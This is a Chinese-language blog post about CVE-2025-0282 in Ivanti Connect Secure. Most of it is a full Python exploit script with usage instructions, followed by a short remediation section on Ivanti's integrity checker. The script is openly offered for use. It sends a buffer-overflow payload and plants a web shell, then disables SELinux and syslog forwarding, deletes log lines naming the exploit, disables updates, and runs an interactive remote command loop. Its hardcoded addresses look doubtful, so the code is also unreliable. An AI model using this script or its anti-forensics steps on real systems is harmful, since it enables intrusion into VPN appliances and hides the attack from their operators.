CVE-2025-0282  Ivanti Connect Secure RCE exp

CVE-2025-0282  Ivanti Connect Secure RCE exp

CVE-2025-0282简介

CVE-2025-0282 是 Ivanti Connect Secure 中发现的一个严重漏洞,允许通过缓冲区溢出漏洞执行远程命令执行 (RCE)。此漏洞使攻击者能够上传恶意文件(例如,Web Shell)并以提升的权限在目标系统上执行命令。

受影响的版本

CVE名称 产品名称
受影响的版本 
受影响的 CPE 已解决的版本 补丁下载地址 
CVE-2025-0282 Ivanti Connect Secure 22.7R2 至 22.7R2.4 cpe:2.3:a:ivanti:connect_secure:22.7:R2.4:*:*:*:*.*.* 22.7R2.5 Download Portal https://portal.ivanti.com/ 
CVE-2025-0283 Ivanti Connect Secure 22.7R2.4 及之前版本, 
9.1R18.9 及之前版本 
cpe:2.3:a:ivanti:connect_secure:22.7:R2.4:*:*:*:*.*.* 22.7R2.5 Download Portal https://portal.ivanti.com/ 
CVE-2025-0282 Ivanti Policy Secure 22.7R1 至 22.7R1.2cpe:2.3:a:ivanti:policy_secure:22.7:r1.2:*:*:*:*.*.  Patch planned availability Jan. 21 
CVE-2025-0283 Ivanti Policy Secure 22.7R1.2 及之前版本cpe:2.3:a:ivanti:policy_secure:22.7:r1.2:*:*:*:*.*.  Patch planned availability Jan. 21 
CVE-2025-0282 Ivanti Neurons for ZTA gateways 22.7R2 至 22.7R2.3 N/A 22.7R2.5 Patch planned availability Jan. 21  
CVE-2025-0283 Ivanti Neurons for ZTA gateways 22.7R2.3 及之前版本 N/A 22.7R2.5 Patch planned availability Jan. 21  

CVE-2025-0282 exp 下载地址

https://github.com/absholi7ly/CVE-2025-0282-Ivanti-exploit/archive/refs/heads/main.zip

CVE_2025_0282_Ivanti.py

import requests
import sys
import struct
import socket
import ssl
import urllib3
import time

# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def create_exploit_payload(command, offset=500, system_address=0x0804a360, command_address=0x0804b008):

    payload = b"A" * offset  # Fill the buffer
    payload += struct.pack("<I", system_address)  # Overwrite return address with system()
    payload += b"BBBB"  # Fake return address
    payload += struct.pack("<I", command_address)  # Address of the command
    payload += command.encode()  # Command to execute
    return payload

def send_payload(target_ip, payload):

    try:
        context = ssl.create_default_context()
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE

        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        ssl_sock = context.wrap_socket(sock, server_hostname=target_ip)

        ssl_sock.connect((target_ip, 443))
        print(f"[+] Connected to {target_ip} on port 443 (HTTPS).")

        exploit_endpoint = "/dana-na/auth/url_default/welcome.cgi"
        http_request = (
            f"POST {exploit_endpoint} HTTP/1.1\r\n"
            f"Host: {target_ip}\r\n"
            f"Content-Length: {len(payload)}\r\n"
            f"Content-Type: application/x-www-form-urlencoded\r\n"
            f"\r\n"
        ).encode() + payload

        ssl_sock.send(http_request)
        response = ssl_sock.recv(4096)
        ssl_sock.close()
        return response.decode(errors="replace")

    except Exception as e:
        print(f"[-] Error sending payload: {e}")
        return None

def exploit_vulnerability(target_ip, command):

    payload = create_exploit_payload(command)
    response = send_payload(target_ip, payload)
    if response:
        print("[+] Payload sent successfully.")
    else:
        print("[-] No response received.")

def upload_web_shell(target_ip, local_shell_path):

    try:
        with open(local_shell_path, "r") as f:
            web_shell_content = f.read()

        command = f"echo '{web_shell_content}' > /shell.php"
        exploit_vulnerability(target_ip, command)
        print("[+] Web shell uploaded successfully at /shell.php.")
        verify_shell(target_ip)

    except Exception as e:
        print(f"[-] Error uploading web shell: {e}")

def verify_shell(target_ip):

    shell_url = f"http://{target_ip}/shell.php"
    try:
        response = requests.get(shell_url, verify=False, timeout=10)
        if response.status_code == 200:
            print("[+] Web shell is accessible.")
        else:
            print(f"[-] Web shell is not accessible. HTTP status: {response.status_code}")
    except Exception as e:
        print(f"[-] Error verifying web shell: {e}")

def execute_shell_command(target_ip, command):

    shell_url = f"http://{target_ip}/shell.php"
    try:
        response = requests.post(shell_url, data={"cmd": command}, verify=False, timeout=10)
        if response.status_code == 200:
            print(f"[+] Command output:\n{response.text.strip()}")
        else:
            print(f"[-] Failed to execute command via shell. HTTP status: {response.status_code}")
    except Exception as e:
        print(f"[-] Error executing command via web shell: {e}")

def disable_selinux(target_ip):
    command = "setenforce 0"
    execute_shell_command(target_ip, command)
    print("[+] SELinux disabled.")

def prevent_syslog_forwarding(target_ip):
    command = "sed -i '/^*.* @/d' /etc/rsyslog.conf"
    execute_shell_command(target_ip, command)
    command = "systemctl restart rsyslog"
    execute_shell_command(target_ip, command)
    print("[+] Syslog forwarding disabled.")

def remount_drive_rw(target_ip):
    command = "mount -o remount,rw /"
    execute_shell_command(target_ip, command)
    print("[+] Drive remounted as read-write.")

def remove_log_entries(target_ip):
    command = "sed -i '/CVE-2025-0282/d' /var/log/*"
    execute_shell_command(target_ip, command)
    print("[+] Log entries related to the exploit removed.")

def enable_selinux(target_ip):
    command = "setenforce 1"
    execute_shell_command(target_ip, command)
    print("[+] SELinux re-enabled.")

def remount_drive_ro(target_ip):
    command = "mount -o remount,ro /"
    execute_shell_command(target_ip, command)
    print("[+] Drive remounted as read-only.")

def disable_updates(target_ip):

    commands = [
        "systemctl stop apt-daily.service",
        "systemctl disable apt-daily.service"
    ]
    for command in commands:
        execute_shell_command(target_ip, command)
    print("[+] System updates disabled successfully.")

def main():

    if len(sys.argv) != 3:
        print("Usage: python3 cve_2025_0282.py <target IP> <local_shell_path>")
        sys.exit(1)

    target_ip = sys.argv[1]
    local_shell_path = sys.argv[2]

    upload_web_shell(target_ip, local_shell_path)

    disable_selinux(target_ip)
    prevent_syslog_forwarding(target_ip)
    remount_drive_rw(target_ip)
    remove_log_entries(target_ip)
    enable_selinux(target_ip)
    remount_drive_ro(target_ip)

    while True:
        command = input("Enter command to execute on the target (or 'exit' to quit): ")
        if command.lower() == "exit":
            print("Exiting...")
            break

        execute_shell_command(target_ip, command)

if __name__ == "__main__":
    main()

上传 Web Shell命令

要使用该工具将 Web Shell 上传到目标系统:

python3 CVE_2025_0282_Ivanti.py <target_ip> <local_shell_path>
  • <target_ip>:目标服务器的 IP 地址。
  • <local_shell_path>:本地计算机上的 Web Shell 文件的路径。

执行远程命令

成功上传Webshel​​l后,该工具允许你以交互方式在目标系统上执行命令。

CVE-2025-0282  Ivanti Connect Secure RCE exp

修复建议

Ivanti 客户可以利用其完整性检查工具 (ICT)来识别 CVE-2025-0282 的利用。

对于 Connect Secure 客户,Ivanti 建议在升级到 22.7R2.5 版本之前,出于“谨慎考虑”,对 ICT 扫描结果干净的设备执行恢复出厂设置,并“确保删除所有恶意软件”,如果 ICT 结果“显示出受损迹象”。

Ivanti 产品安全事件响应团队 (PSIRT) 推出了一款新工具,以增强您确保 Ivanti Connect Secure 和 Ivanti Policy Secure 软件完全完整性的能力。  
本文介绍了我们新开发的 Ivanti Connect Secure/Ivanti Policy Secure 完整性工具并提供了快速入门指南。  

完整性工具可让管理员验证虚拟或硬件设备上安装的 ICS/IPS 映像。此工具可检查整个文件系统的完整性并查找任何附加/修改的文件。

过去,入侵者主要针对基础设施设备。虽然入侵者可以对网络设备执行多种类型的攻击,但恶意行为者现在正在寻找破坏基础设施设备正常行为的方法。
一般来说,这些入侵者可以获得访问权限,通常是通过利用系统上的漏洞或可能通过多种社会工程攻击来操纵授权用户。
请参阅安全公告部分了解所有漏洞和披露。

完整性检查工具 (ICT)下载地址

注意:完整性工具只能用于检查正在运行的代码版本的完整性。
 

诚信工具下载
完整性检查工具下载


适用于特定服务器类型和版本的完整性检查工具包

服务器类型和版本诚信工具包
Ivanti Connect Secure 22.X_R1ICS_22.xR1_ICT_package-2511.1.pkg
Ivanti Connect Secure 22.X_R2ICS_22.xR2 ICT_package-2515.1.pkg
Ivanti Connect Secure 9.XICS_9.x ICT_package-24793.1.pkg
Ivanti Policy Secure 22.XR1IPS_22.xR1 ICT_package-605.1.pkg
Ivanti Policy Secure 9.XIPS_9.x ICT_package-9953.1.pkg

官方公布详情

https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-0282-CVE-2025-0283?language=en_US

漏洞细节

https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day

项目地址

GitHub:
https://github.com/absholi7ly/CVE-2025-0282-Ivanti-exploit

转载请注明出处及链接

Leave a Reply

您的邮箱地址不会被公开。 必填项已用 * 标注